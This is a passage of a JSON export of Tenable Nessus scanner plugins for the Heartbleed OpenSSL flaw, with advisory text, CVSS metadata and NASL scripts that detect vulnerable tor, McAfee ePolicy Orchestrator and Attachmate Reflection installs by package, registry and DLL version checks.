fixes. These include blocking all\n authority signing keys that may have been affected by\n the OpenSSL 'heartbleed' bug, choosing a far more secure\n set of TLS ciphersuites by default, closing a couple of\n memory leaks that could be used to run a target relay\n out of RAM.\n\n - Major features (security)\n\n - Block authority signing keys that were used on\n authorities vulnerable to the 'heartbleed' bug in\n OpenSSL (CVE-2014-0160).\n\n - Major bugfixes (security, OOM) :\n\n - Fix a memory leak that could occur if a microdescriptor\n parse fails during the tokenizing step.\n\n - Major bugfixes (TLS cipher selection) :\n\n - The relay ciphersuite list is now generated\n automatically based on uniform criteria, and includes\n all OpenSSL ciphersuites with acceptable strength and\n forward secrecy.\n\n - Relays now trust themselves to have a better view than\n clients of which TLS ciphersuites are better than\n others.\n\n - Clients now try to advertise the same list of\n ciphersuites as Firefox 28.\n\n - includes changes from 0.2.4.21: Further improves\n security against potential adversaries who find breaking\n 1024-bit crypto doable, and backports several stability\n and robustness patches from the 0.2.5 branch.\n\n - Major features (client security) :\n\n - When we choose a path for a 3-hop circuit, make sure it\n contains at least one relay that supports the NTor\n circuit extension handshake. Otherwise, there is a\n chance that we're building a circuit that's worth\n attacking by an adversary who finds breaking 1024-bit\n crypto doable, and that chance changes the game theory.\n\n - Major bugfixes :\n\n - Do not treat streams that fail with reason\n END_STREAM_REASON_INTERNAL as indicating a definite\n circuit failure, since it could also indicate an\n ENETUNREACH connection error\n\n - includes changes from 0.2.4.20 :\n\n - Do not allow OpenSSL engines to replace the PRNG, even\n when HardwareAccel is set.\n\n - Fix assertion failure when AutomapHostsOnResolve yields\n an IPv6 address.\n\n - Avoid launching spurious extra circuits when a stream is\n pending.\n\n - packaging changes :\n\n - remove init script shadowing systemd unit\n\n - general cleanup\n\n - Add tor-fw-helper for UPnP port forwarding; not used by\n default\n\n - fix logrotate on systemd-only setups without init\n scripts, work tor-0.2.2.37-logrotate.patch to\n tor-0.2.4.x-logrotate.patch\n\n - verify source tarball signature", "edition": 6, "reporter": "Tenable", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : tor (openSUSE-SU-2014:0719-1) (Heartbleed)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:tor-debugsource", "p-cpe:/a:novell:opensuse:tor-debuginfo", "p-cpe:/a:novell:opensuse:tor", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-398.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75376", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-398.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75376);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:50:02\");\n\n script_cve_id(\"CVE-2014-0160\");\n\n script_name(english:\"openSUSE Security Update : tor (openSUSE-SU-2014:0719-1) (Heartbleed)\");\n script_summary(english:\"Check for the openSUSE-2014-398 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - tor 0.2.4.22 [bnc#878486] Tor was updated to the\n recommended version of the 0.2.4.x series.\n\n - major features in 0.2.4.x :\n\n - improved client resilience\n\n - support better link encryption with forward secrecy\n\n - new NTor circuit handshake\n\n - change relay queue for circuit create requests from\n size-based limit to time-based limit\n\n - many bug fixes and minor features\n\n - changes contained in 0.2.4.22: Backports numerous\n high-priority fixes. These include blocking all\n authority signing keys that may have been affected by\n the OpenSSL 'heartbleed' bug, choosing a far more secure\n set of TLS ciphersuites by default, closing a couple of\n memory leaks that could be used to run a target relay\n out of RAM.\n\n - Major features (security)\n\n - Block authority signing keys that were used on\n authorities vulnerable to the 'heartbleed' bug in\n OpenSSL (CVE-2014-0160).\n\n - Major bugfixes (security, OOM) :\n\n - Fix a memory leak that could occur if a microdescriptor\n parse fails during the tokenizing step.\n\n - Major bugfixes (TLS cipher selection) :\n\n - The relay ciphersuite list is now generated\n automatically based on uniform criteria, and includes\n all OpenSSL ciphersuites with acceptable strength and\n forward secrecy.\n\n - Relays now trust themselves to have a better view than\n clients of which TLS ciphersuites are better than\n others.\n\n - Clients now try to advertise the same list of\n ciphersuites as Firefox 28.\n\n - includes changes from 0.2.4.21: Further improves\n security against potential adversaries who find breaking\n 1024-bit crypto doable, and backports several stability\n and robustness patches from the 0.2.5 branch.\n\n - Major features (client security) :\n\n - When we choose a path for a 3-hop circuit, make sure it\n contains at least one relay that supports the NTor\n circuit extension handshake. Otherwise, there is a\n chance that we're building a circuit that's worth\n attacking by an adversary who finds breaking 1024-bit\n crypto doable, and that chance changes the game theory.\n\n - Major bugfixes :\n\n - Do not treat streams that fail with reason\n END_STREAM_REASON_INTERNAL as indicating a definite\n circuit failure, since it could also indicate an\n ENETUNREACH connection error\n\n - includes changes from 0.2.4.20 :\n\n - Do not allow OpenSSL engines to replace the PRNG, even\n when HardwareAccel is set.\n\n - Fix assertion failure when AutomapHostsOnResolve yields\n an IPv6 address.\n\n - Avoid launching spurious extra circuits when a stream is\n pending.\n\n - packaging changes :\n\n - remove init script shadowing systemd unit\n\n - general cleanup\n\n - Add tor-fw-helper for UPnP port forwarding; not used by\n default\n\n - fix logrotate on systemd-only setups without init\n scripts, work tor-0.2.2.37-logrotate.patch to\n tor-0.2.4.x-logrotate.patch\n\n - verify source tarball signature\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=878486\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-05/msg00079.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected tor packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tor-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tor-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"tor-0.2.4.22-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"tor-debuginfo-0.2.4.22-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"tor-debugsource-0.2.4.22-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tor-0.2.4.22-5.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tor-debuginfo-0.2.4.22-5.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tor-debugsource-0.2.4.22-5.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tor / tor-debuginfo / tor-debugsource\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:18:21", "references": ["https://kc.mcafee.com/corporate/index?page=content&id=SB10071", "https://www.openssl.org/news/vulnerabilities.html#2014-0160", "https://eprint.iacr.org/2014/140", "https://www.openssl.org/news/secadv/20140407.txt", "http://www.heartbleed.com"], "pluginID": "73833", "description": "The remote host is running a version of McAfee ePolicy Orchestrator\nthat is affected by an information disclosure due to a flaw in the\nOpenSSL library, commonly known as the Heartbleed bug. An attacker\ncould potentially exploit this vulnerability repeatedly to read up to\n64KB of memory from the device.", "edition": 7, "reporter": "Tenable", "published": "2014-05-02T00:00:00", "title": "McAfee ePolicy Orchestrator OpenSSL Information Disclosure (SB10071) (Heartbleed)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Misc.", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:mcafee:epolicy_orchestrator"], "id": "MCAFEE_EPO_SB10071.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73833);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/14 1:59:37\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10071\");\n \n script_name(english:\"McAfee ePolicy Orchestrator OpenSSL Information Disclosure (SB10071) (Heartbleed)\");\n script_summary(english:\"Checks version of ePolicy Orchestrator.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of McAfee ePolicy Orchestrator\nthat is affected by an information disclosure due to a flaw in the\nOpenSSL library, commonly known as the Heartbleed bug. An attacker\ncould potentially exploit this vulnerability repeatedly to read up to\n64KB of memory from the device.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10071\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\"Apply Hotfix 960279 per the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:epolicy_orchestrator\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_epo_installed.nasl\");\n script_require_keys(\"SMB/mcafee_epo/Path\", \"SMB/mcafee_epo/ver\");\n script_require_ports(\"SMB/transport\", 139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\n\napp_name = \"McAfee ePolicy Orchestrator\";\nversion = get_kb_item_or_exit(\"SMB/mcafee_epo/ver\");\ninstall_path = get_kb_item_or_exit(\"SMB/mcafee_epo/Path\");\n\nhotfix = 'Hotfix 960279';\nhotfix_file = \"Apache2\\bin\\ssleay32.dll\";\nhotfix_fversion = \"1.0.1.7\";\nmin_affected = \"1.0.1\";\n\n# Versions 4.6, 5.0 and 5.1 are affected.\nif (version !~ \"^4\\.6\\.\" && version !~ \"^5\\.[01]\\.\") audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, install_path);\n\n# Check the version of the affected DLL.\ndll_path = hotfix_append_path(path:install_path, value:hotfix_file);\ndll_version = hotfix_get_fversion(path:dll_path);\nhotfix_handle_error(error_code:dll_version['error'], file:dll_path, appname:app_name, exit_on_fail:TRUE);\nhotfix_check_fversion_end();\n\ndll_version = join(dll_version['value'], sep:'.');\n\nif (ver_compare(ver:dll_version, fix:min_affected, strict:FALSE) == -1) audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, install_path);\n\nif (ver_compare(ver:dll_version, fix:hotfix_fversion, strict:FALSE) == -1)\n{\n port = kb_smb_transport();\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + install_path +\n '\\n Installed version : ' + version +\n '\\n OpenSSL DLL : ' + dll_path +\n '\\n DLL version : ' + dll_version +\n '\\n Fixed version : ' + hotfix_fversion +\n '\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, hotfix);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:18:23", "references": ["http://support.attachmate.com/techdocs/2288.html", "https://www.openssl.org/news/vulnerabilities.html#2014-0160", "https://eprint.iacr.org/2014/140", "https://www.openssl.org/news/secadv/20140407.txt", "http://www.heartbleed.com"], "pluginID": "73965", "description": "The Attachmate Reflection Secure IT Windows Client install on the\nremote host contains a component, Reflection FTP Client, which is\naffected by an out-of-bounds read error, known as the 'Heartbleed Bug'\nin the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.", "edition": 6, "reporter": "Tenable", "published": "2014-05-12T00:00:00", "title": "Attachmate Reflection Secure IT Windows Client Information Disclosure (Heartbleed)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/a:attachmate:reflection_for_secure_it_client"], "id": "ATTACHMATE_REFLECTION_SECURE_IT_FOR_WIN_CLIENT_HEARTBLEED.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73965", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73965);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Attachmate Reflection Secure IT Windows Client Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks openssl.dll version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Attachmate Reflection Secure IT Windows Client install on the\nremote host contains a component, Reflection FTP Client, which is\naffected by an out-of-bounds read error, known as the 'Heartbleed Bug'\nin the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/2288.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Reflection for Secure IT Windows Client 7.2 SP3 Update 1\n(version 7.2.3.222) or greater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:attachmate:reflection_for_secure_it_client\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nport = kb_smb_transport();\nappname = 'Attachmate Reflection for Secure IT Windows Client';\n\ndisplay_names = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nin_registry = FALSE;\nforeach key (display_names)\n if (\"Attachmate Reflection for Secure IT Client\" >< key) in_registry = TRUE;\n\nif (!in_registry) audit(AUDIT_NOT_INST, appname);\n\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\npath = NULL;\n\nforeach key (keys(display_names))\n{\n display_name = display_names[key];\n\n if (\"Attachmate Reflection for Secure IT Client\" >!< display_name) continue;\n key -= '/DisplayName';\n key -= 'SMB/Registry/HKLM/';\n key = str_replace(string:key, find:\"/\", replace:'\\\\');\n break;\n}\n\n# Very rough check on ver in registry\n# If not in paranoid mode, and no version available\n# from the registry or version is not 7.0.x - 7.2.x,\n# then exit.\ndisplay_version_key = key + \"\\DisplayVersion\";\ndisplay_version = get_registry_value(handle:hklm, item:display_version_key);\nif (\n (\n isnull(display_version) ||\n display_version !~ \"^7\\.[012]($|[^0-9])\"\n )\n && report_paranoia < 2\n)\n{\n RegCloseKey(handle:hklm);\n close_registry();\n\n if (isnull(display_version)) audit(AUDIT_UNKNOWN_APP_VER, appname);\n else\n audit(AUDIT_NOT_INST, appname + \"7.0.x through 7.2.x\");\n}\n\n# Get install dir\ninstall_location_key = key + \"\\InstallLocation\";\ninstall_location = get_registry_value(handle:hklm, item:install_location_key);\nRegCloseKey(handle:hklm);\nif (isnull(install_location))\n{\n close_registry();\n exit(1, \"Unable to obtain install path from registry key : '\"+install_location_key+\"'.\");\n}\n\nitem = eregmatch(pattern:\"^(.+\\\\)[^\\\\]*$\", string:install_location);\nif (isnull(item))\n{\n close_registry();\n exit(1, \"Unable to obtain install path from registry key : '\"+install_location_key+\"'.\");\n}\n\npath = item[1];\n\nif (isnull(path))\n{\n close_registry();\n exit(1, \"Unable to obtain install path from registry key : '\"+install_location_key+\"'.\");\n}\nclose_registry(close:FALSE);\n\nexe = path + \"openssl.dll\";\n\nver = hotfix_get_fversion(path:exe);\nerr_res = hotfix_handle_error(\n error_code : ver['error'],\n file : exe,\n appname : appname,\n exit_on_fail : TRUE\n);\nhotfix_check_fversion_end();\n\nversion = join(ver['value'], sep:\".\");\n\n# Vendor patch contains Openssl.dll version 14.1.411.0\nif (ver_compare(ver:version, fix:\"14.1.411.0\", strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Product : ' + appname +\n '\\n File : ' + exe +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 14.1.411.0' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, appname);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:18:28", "references": ["http://support.attachmate.com/techdocs/1708.html", "https://www.openssl.org/news/vulnerabilities.html#2014-0160", "https://eprint.iacr.org/2014/140", "https://www.openssl.org/news/secadv/20140407.txt", "http://support.attachmate.com/techdocs/2724.html", "http://www.heartbleed.com"], "pluginID": "74186", "description": "The Attachmate Reflection X install on the remote host is affected by\nan out-of-bounds read error, known as the 'Heartbleed Bug' in the\nincluded OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.", "edition": 6, "reporter": "Tenable", "published": "2014-05-27T00:00:00", "title": "Attachmate Reflection X Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/a:attachmate:reflection_x"], "id": "ATTACHMATE_REFLECTION_X_HEARTBLEED.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74186", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74186);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Attachmate Reflection X Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks openssl.dll version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Attachmate Reflection X install on the remote host is affected by\nan out-of-bounds read error, known as the 'Heartbleed Bug' in the\nincluded OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/2724.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/1708.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Reflection X 14.1 SP3 Update 1 (version 14.1.3.247) or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:attachmate:reflection_x\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nport = kb_smb_transport();\nappname = 'Attachmate Reflection X';\n\ndisplay_names = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nin_registry = FALSE;\nforeach key (display_names)\n if (\"Attachmate Reflection X \" >< key) in_registry = TRUE;\n\nif (!in_registry) audit(AUDIT_NOT_INST, appname);\n\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\npath = NULL;\n\nforeach key (keys(display_names))\n{\n display_name = display_names[key];\n\n if (\"Attachmate Reflection X \" >!< display_name) continue;\n key -= '/DisplayName';\n key -= 'SMB/Registry/HKLM/';\n key = str_replace(string:key, find:\"/\", replace:'\\\\');\n break;\n}\n\n# Very rough check on ver in registry\n# If not in paranoid mode, and no version available\n# from the registry or version is not 14.0.x / 14.1.x\n# then exit.\ndisplay_version_key = key + \"\\DisplayVersion\";\ndisplay_version = get_registry_value(handle:hklm, item:display_version_key);\nif (\n (\n isnull(display_version) ||\n display_version !~ \"^14\\.[01]($|[^0-9])\"\n )\n && report_paranoia < 2\n)\n{\n RegCloseKey(handle:hklm);\n close_registry();\n if (isnull(display_version)) audit(AUDIT_UNKNOWN_APP_VER, appname);\n else audit(AUDIT_NOT_INST, appname + \"14.0.x through 14.1.x\");\n}\n\n# Get install dir\ninstall_location_key = key + \"\\InstallLocation\";\ninstall_location = get_registry_value(handle:hklm, item:install_location_key);\nif (isnull(install_location))\n{\n # In the case of X 14.1.x, try another key\n arch = get_kb_item(\"SMB/ARCH\");\n if (arch == \"x64\")\n item = \"SOFTWARE\\Wow6432Node\\WRQReflection\\Rx\\config\\Server\\InstallDir\";\n else\n item = \"SOFTWARE\\WRQReflection\\Rx\\config\\Server\\InstallDir\";\n\n install_location = get_registry_value(\n handle : hklm,\n item : item\n );\n\n RegCloseKey(handle:hklm);\n if (isnull(install_location))\n {\n close_registry();\n exit(1, \"Unable to obtain install path from registry.\");\n }\n}\nRegCloseKey(handle:hklm);\n\nitem = eregmatch(pattern:\"^(.+\\\\)[^\\\\]*$\", string:install_location);\nif (isnull(item) || isnull(item[1]))\n{\n close_registry();\n exit(1, \"Unable to obtain install path from registry key : '\"+install_location_key+\"'.\");\n}\n\npath = item[1];\n\nclose_registry(close:FALSE);\n\nexe = path + \"openssl.dll\";\n\nver = hotfix_get_fversion(path:exe);\nerr_res = hotfix_handle_error(\n error_code : ver['error'],\n file : exe,\n appname : appname,\n exit_on_fail : 